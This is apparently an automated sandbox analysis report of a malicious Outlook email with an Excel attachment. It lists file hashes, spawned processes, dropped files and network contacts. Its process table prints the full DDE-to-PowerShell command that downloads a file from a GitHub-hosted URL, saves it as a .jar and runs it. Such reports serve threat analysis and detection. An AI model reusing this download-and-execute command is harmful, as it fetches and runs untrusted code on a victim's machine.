File name: | Administrator Notification_ Redirecting email with malware.msg |
Full analysis: | https://app.any.run/tasks/23bd7236-6071-4343-8ae5-1fc5385e8882 |
Verdict: | Malicious activity |
Analysis date: | October 09, 2019, 13:08:11 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | application/vnd.ms-outlook |
File info: | CDFV2 Microsoft Outlook Message |
MD5: | C4F4B9B591B8F72A0933E2A980858774 |
SHA1: | 6E43807CCA6B51F6FFBD8D4BF5D79237D226E5F6 |
SHA256: | 30E3C0EB8A405B523C59E11E89FFD17C643AFDA375839C985013EAA1F4B20CD1 |
SSDEEP: | 3072:9AEgTcrQVr9O5w52Ai6LXqOnFQi+BHDDD3r:CcMVh5iyXqOqiiDDDb |
.msg | | | Outlook Message (58.9) |
---|---|---|
.oft | | | Outlook Form Template (34.4) |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2816 | "C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE" /f "C:\Users\admin\AppData\Local\Temp\Administrator Notification_ Redirecting email with malware.msg" | C:\Program Files\Microsoft Office\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
2572 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
3084 | CMD.EXE /c powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/773480834/3497cm47rvty1rg/gh-pages/08l534ulvt.xls\" ,\" %tmp%\\I52tGC.jar\") }" & %tmp%\\I52tGC.jar | C:\Windows\system32\CMD.EXE | — | EXCEL.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3720 | powershell -command "& { (new-object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/773480834/3497cm47rvty1rg/gh-pages/08l534ulvt.xls\" ,\" C:\Users\admin\AppData\Local\Temp\\I52tGC.jar\") }" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | CMD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2760 | "C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe" -jar "C:\Users\admin\AppData\Local\Temp\I52tGC.jar" | C:\Program Files\Java\jre1.8.0_92\bin\javaw.exe | — | CMD.EXE |
User: admin Company: Oracle Corporation Integrity Level: MEDIUM Description: Java(TM) Platform SE binary Exit code: 0 Version: 8.0.920.14 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR2D9E.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\~DF7E6FE25C82C6FF11.TMP | — | |
MD5:— | SHA256:— | |||
2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\N7CO2YHC\Siparis (2).xls\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
2572 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVRABE6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3720 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZYEKY07DS0869C5OM41U.temp | — | |
MD5:— | SHA256:— | |||
2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:74BCA61AB8ED1FA6A3BAFD9A9FCEA026 | SHA256:270729F05C7ADE676E89FBD74210D16D8211CFB7CA10E48996E8CB44D179D4DA | |||
3720 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A670ADD3BF0A1901BD12CC7C4CD70086 | SHA256:98E5263D6949B8F81010D65760BB299D37BCF272CE0FFDF5668E2D5CC1545986 | |||
2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\N7CO2YHC\Selam ACIL KONTROL EDIN .msg | msg | |
MD5:1DD951854BB96C71428C29BFF63EF7F1 | SHA256:AB45E257547AE621F3EAF931592BA439F2AD2DAE46A82D0C945E87B25DE0F2F6 | |||
2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Outlook\RoamCache\Stream_AvailabilityOptions_2_2E25B9F57B733D4499A493454E0F3809.dat | xml | |
MD5:EEAA832C12F20DE6AAAA9C7B77626E72 | SHA256:C4C9A90F2C961D9EE79CF08FBEE647ED7DE0202288E876C7BAAD00F4CA29CA16 | |||
2816 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\N7CO2YHC\Siparis (2).xls | text | |
MD5:3A8487DA8953DE0A886EC784F2AC5941 | SHA256:E0DE585E7C5270C7F36AFC2F013AA5DF64EC507F67C15C912C23B0ACF0EE4845 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3720 | powershell.exe | 151.101.0.133:443 | raw.githubusercontent.com | Fastly | US | malicious |
2816 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
raw.githubusercontent.com |
| shared |